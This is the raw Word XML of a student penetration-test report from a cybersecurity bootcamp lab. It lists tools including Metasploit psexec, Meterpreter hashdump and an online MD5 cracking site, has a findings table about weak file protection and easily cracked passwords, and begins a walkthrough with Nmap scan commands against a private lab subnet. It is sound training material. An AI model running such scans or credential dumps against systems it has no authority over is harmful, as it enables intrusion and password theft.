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8855BF" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_ivo664to839c" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474E6EE8" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_iolb5syqtotn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>Cybersecurity Analytics Bootcamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701910D" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_c9yq5pzhvrf1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Engagement Contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0226603D" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:r>
        <w:t>[Replace this text with the names of your team members.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1546C6B3" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_c94sa1fsd96e" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57417FE5" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_4d6xws2i4enw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEAE15" w14:textId="69A4C3B2" w:rsidR="007D4617" w:rsidRDefault="007D4617" w:rsidP="007D4617">
      <w:r>
        <w:t xml:space="preserve">As requested by the Company, a pen test was requested to ensure that the security posture of the web server is fully secured by using any means to get into the system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D40ED1A" w14:textId="26853B83" w:rsidR="007D4617" w:rsidRPr="007D4617" w:rsidRDefault="007D4617" w:rsidP="007D4617">
      <w:r>
        <w:t xml:space="preserve">While insuring there would be no zero-day exploitation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC9AD7" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A7B1E" w14:textId="2528747B" w:rsidR="007D4617" w:rsidRDefault="007D4617" w:rsidP="007D4617">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3AD8F1" w14:textId="09702A4B" w:rsidR="007D4617" w:rsidRDefault="007D4617" w:rsidP="007D4617">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection from the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8A76F" w14:textId="09E6CB50" w:rsidR="007D4617" w:rsidRDefault="00EA40AE" w:rsidP="007D4617">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A738825" w14:textId="68431341" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="007D4617">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Text Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B664679" w14:textId="6E8782A7" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="007D4617">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Third Party hash database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F14F0" w14:textId="32234187" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="00EA40AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="007B11D5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://10015.io/tools/md5-encrypt-decrypt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0524667A" w14:textId="494E7621" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="00EA40AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A916793" w14:textId="146C943B" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="00EA40AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31A28974" w14:textId="49DCED41" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="00EA40AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156D74E4" w14:textId="01E33816" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="00EA40AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="008BCE8C" w14:textId="54D4D944" w:rsidR="00EA40AE" w:rsidRDefault="00EA40AE" w:rsidP="00EA40AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F486159" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_wn5tidj91b3j" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Penetration Test Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26835A5F" w14:textId="472BE698" w:rsidR="00BA1741" w:rsidRDefault="00000000" w:rsidP="004963C8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_kv5li429lqow" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>Summary</w: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45"/>
        <w:gridCol w:w="1515"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA1741" w14:paraId="2CB1F553" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1245" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F3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EBC84" w14:textId="77777777" w:rsidR="00BA174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Finding #</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F3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2CACD" w14:textId="77777777" w:rsidR="00BA1741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everity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F3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AF2D1" w14:textId="77777777" w:rsidR="00BA174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Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA1741" w14:paraId="08EDA904" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1245" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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D29E0" w14:textId="77777777" w:rsidR="00BA174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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6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C3D1B" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:alias w:val="Review status"/>
                <w:id w:val="1368055018"/>
                <w:dropDownList>
                  <w:listItem w:displayText="Severity" w:value="Severity"/>
                  <w:listItem w:displayText="High" w:value="High"/>
                  <w:listItem w:displayText="Medium" w:value="Medium"/>
                  <w:listItem w:displayText="Low" w:value="Low"/>
                </w:dropDownList>
              </w:sdtPr>
              <w:sdtContent>
                <w:r>
                  <w:rPr>
                    <w:color w:val="3D3D3D"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
                  </w:rPr>
                  <w:t>Severity</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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120A1" w14:textId="2974A810" w:rsidR="00BA1741" w:rsidRDefault="00EA40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Easy to find files </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA1741" w14:paraId="6B0BFD99" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1245" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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9C0D8" w14:textId="77777777" w:rsidR="00BA174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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6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7CF65" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:alias w:val="Review status"/>
                <w:id w:val="-709524252"/>
                <w:dropDownList>
                  <w:listItem w:displayText="Severity" w:value="Severity"/>
                  <w:listItem w:displayText="High" w:value="High"/>
                  <w:listItem w:displayText="Medium" w:value="Medium"/>
                  <w:listItem w:displayText="Low" w:value="Low"/>
                </w:dropDownList>
              </w:sdtPr>
              <w:sdtContent>
                <w:r>
                  <w:rPr>
                    <w:color w:val="3D3D3D"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
                  </w:rPr>
                  <w:t>Severity</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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C46FC" w14:textId="11D95871" w:rsidR="00BA1741" w:rsidRDefault="00EA40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o password protection on files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA1741" w14:paraId="5C90778E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1245" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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CBE6F" w14:textId="77777777" w:rsidR="00BA174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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6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278DF" w14:textId="5A49DAB6" w:rsidR="00BA1741" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:alias w:val="Review status"/>
                <w:id w:val="-1297871716"/>
                <w:dropDownList>
                  <w:listItem w:displayText="Severity" w:value="Severity"/>
                  <w:listItem w:displayText="High" w:value="High"/>
                  <w:listItem w:displayText="Medium" w:value="Medium"/>
                  <w:listItem w:displayText="Low" w:value="Low"/>
                </w:dropDownList>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="00EA40AE">
                  <w:t>Severity</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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3E6F6" w14:textId="7364EA05" w:rsidR="00BA1741" w:rsidRDefault="00EA40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o Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA1741" w14:paraId="6096CA22" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1245" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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77D18" w14:textId="77777777" w:rsidR="00BA174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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6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6DAE3" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:alias w:val="Review status"/>
                <w:id w:val="205465698"/>
                <w:dropDownList>
                  <w:listItem w:displayText="Severity" w:value="Severity"/>
                  <w:listItem w:displayText="High" w:value="High"/>
                  <w:listItem w:displayText="Medium" w:value="Medium"/>
                  <w:listItem w:displayText="Low" w:value="Low"/>
                </w:dropDownList>
              </w:sdtPr>
              <w:sdtContent>
                <w:r>
                  <w:rPr>
                    <w:color w:val="3D3D3D"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
                  </w:rPr>
                  <w:t>Severity</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="BDC1C6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="BDC1C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7EFC8" w14:textId="19035513" w:rsidR="00BA1741" w:rsidRDefault="00EA40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he Password was easy to decrypt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> using the </w:t>
            </w:r>
            <w:r w:rsidR="0004442B">
              <w:t>third party database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13D56B92" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_dkryx04zz2uk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>Detailed Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53391ADA" w14:textId="77777777" w:rsidR="009A6EE5" w:rsidRDefault="009A6EE5"/>
    <w:p w14:paraId="211DD44C" w14:textId="165BE854" w:rsidR="009A6EE5" w:rsidRDefault="009A6EE5" w:rsidP="009A6EE5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Challenge 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E06113F" w14:textId="77777777" w:rsidR="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2FD7">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Nmap to run a basic scan on the subnet your Kali machine is connected to. You should find four hosts in your results, not including your own Kali machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22352DCA" w14:textId="6D9528AB" w:rsidR="00DF2FD7" w:rsidRPr="00B9157C" w:rsidRDefault="00B9157C" w:rsidP="00DF2FD7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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31E24838" w14:textId="1406061A" w:rsidR="00B9157C" w:rsidRDefault="00B9157C" w:rsidP="00DF2FD7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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap 172.31.58.108/20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B67B4A" w14:textId="700C9120" w:rsidR="00DF2FD7" w:rsidRDefault="00B9157C" w:rsidP="00DF2FD7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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs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2D286BF1" wp14:editId="6A9C426D">
            <wp:extent cx="5943600" cy="4306570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142512964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129641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27AC" w14:textId="77777777" w:rsidR="00DF2FD7" w:rsidRPr="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD7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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619BF4EE" w14:textId="77777777" w:rsidR="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2FD7">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next, run service and version detection scans on the specific IP addresses found in your first scan. Scan for services beginning at port 1 and ending at port 5000. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E6C06" w14:textId="7FB9D840" w:rsidR="00DF2FD7" w:rsidRDefault="00B9157C" w:rsidP="00DF2FD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D4617">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D4617">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D4617">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D4617">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 1-5000 172.31.58.108/20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9D7A7" w14:textId="77777777" w:rsidR="00B9157C" w:rsidRDefault="00B9157C" w:rsidP="00DF2FD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245103DE" w14:textId="08634DA1" w:rsidR="00B9157C" w:rsidRDefault="00B9157C" w:rsidP="00DF2FD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs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64A5CE63" wp14:editId="62740C34">
            <wp:extent cx="5943600" cy="3420110"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="947666845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66845" name="Picture 1" descr="A computer screen shot of a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7E28" w14:textId="77777777" w:rsidR="00DF2FD7" w:rsidRPr="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD7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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9D2AC3" w14:textId="77777777" w:rsidR="00DF2FD7" w:rsidRPr="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
